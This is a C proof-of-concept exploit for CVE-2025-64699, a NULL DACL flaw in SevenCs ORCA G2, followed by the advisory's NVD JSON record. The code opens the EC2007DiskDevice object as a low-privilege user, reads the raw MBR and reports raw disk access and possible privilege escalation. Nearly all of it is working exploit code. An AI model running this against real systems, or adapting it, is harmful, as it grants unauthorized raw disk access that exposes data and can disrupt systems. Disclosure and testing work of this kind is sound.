CVE-2025-64699

// CVE-2025-64699 PoC - SevenCs ORCA G2 NULL DACL Local Privilege Escalation // This PoC demonstrates exploitation of incorrect NULL DACL in regService // Author: Security Researcher // Note: This is for educational and authorized testing purposes only #include <windows.h> #include <aclapi.h> #include <stdio.h> #pragma comment(lib, "advapi32.lib") int main() { printf("[*] CVE-2025-64699 PoC - SevenCs ORCA G2 NULL DACL Exploitation\n"); printf("[*] Target: SevenCs ORCA G2 2.0.1.35 (EC2007 Kernel v5.22)\n\n"); // Step 1: Attempt to open device object with NULL DACL HANDLE hDevice = CreateFile( "\\\\.\\EC2007DiskDevice", // Target device name GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ); if (hDevice == INVALID_HANDLE_VALUE) { DWORD error = GetLastError(); printf("[-] Failed to open device object. Error code: %lu\n", error); printf("[-] Device may not exist or DACL is properly configured.\n"); return 1; } printf("[+] Successfully opened device object!\n"); printf("[+] This indicates NULL DACL vulnerability is present.\n"); // Step 2: Perform raw disk read to demonstrate unauthorized access BYTE sectorBuffer[512]; DWORD bytesRead = 0; // Read MBR (sector 0) SetFilePointer(hDevice, 0, NULL, FILE_BEGIN); BOOL readResult = ReadFile(hDevice, sectorBuffer, 512, &bytesRead, NULL); if (readResult && bytesRead == 512) { printf("[+] Successfully read raw disk sector (MBR)!\n"); printf("[+] Attacker can now read/write raw disk bypassing file system ACLs.\n"); // Display first 64 bytes of MBR as hex printf("\n[>] First 64 bytes of MBR:\n"); for (int i = 0; i < 64; i++) { printf("%02X ", sectorBuffer[i]); if ((i + 1) % 16 == 0) printf("\n"); } printf("\n"); printf("[!] Impact: Unauthorized raw disk access confirmed.\n"); printf("[!] This can lead to:\n"); printf(" - Sensitive data exfiltration\n"); printf(" - System disruption (DoS)\n"); printf(" - Local privilege escalation\n"); } else { printf("[-] Raw disk read failed.\n"); } CloseHandle(hDevice); // Step 3: Check if running as low-privilege user HANDLE hToken; if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { TOKEN_ELEVATION Elevation; DWORD ReturnLength; if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &ReturnLength)) { if (!Elevation.TokenIsElevated) { printf("\n[+] Confirmed: Running as non-elevated (low-privilege) user.\n"); printf("[+] Successfully exploited vulnerability from low-privilege context!\n"); } } CloseHandle(hToken); } printf("\n[*] PoC execution completed.\n"); return 0; }

{"cve": {"id": "CVE-2025-64699", "sourceIdentifier": "[email protected]", "published": "2025-12-31T16:15:48.110", "lastModified": "2026-01-14T20:33:11.737", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An incorrect NULL DACL issue exists in SevenCs ORCA G2 2.0.1.35 (EC2007 Kernel v5.22). The regService process, which runs with SYSTEM privileges, applies a Security Descriptor to a device object with no explicitly configured DACL. This condition could allow an attacker to perform unauthorized raw disk operations, which could lead to system disruption (DoS) and exposure of sensitive data, and may facilitate local privilege escalation."}, {"lang": "es", "value": "Existe un problema de DACL NULA incorrecta en SevenCs ORCA G2 2.0.1.35 (EC2007 Kernel v5.22). El proceso regService, que se ejecuta con privilegios de SYSTEM, aplica un Descriptor de Seguridad a un objeto de dispositivo sin una DACL configurada explícitamente. Esta condición podría permitir a un atacante realizar operaciones de disco sin procesar no autorizadas, lo que podría provocar la interrupción del sistema (DoS) y la exposición de datos sensibles, y podría facilitar la escalada de privilegios local."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sevencs:ec2007_kernel:5.22:*:*:*:*:*:*:*", "matchCriteriaId": "1B7535E9-C8EB-41F7-A6A8-4698A33E4239"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sevencs:orca_g2:2.0.1.35:*:*:*:*:*:*:*", "matchCriteriaId": "29199970-680B-493F-BB24-F18DE15C1468"}]}]}], "references": [{"url": "https://gist.github.com/GunP4ng/42b19ee99e94c315173b74a9fb26c2b9", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}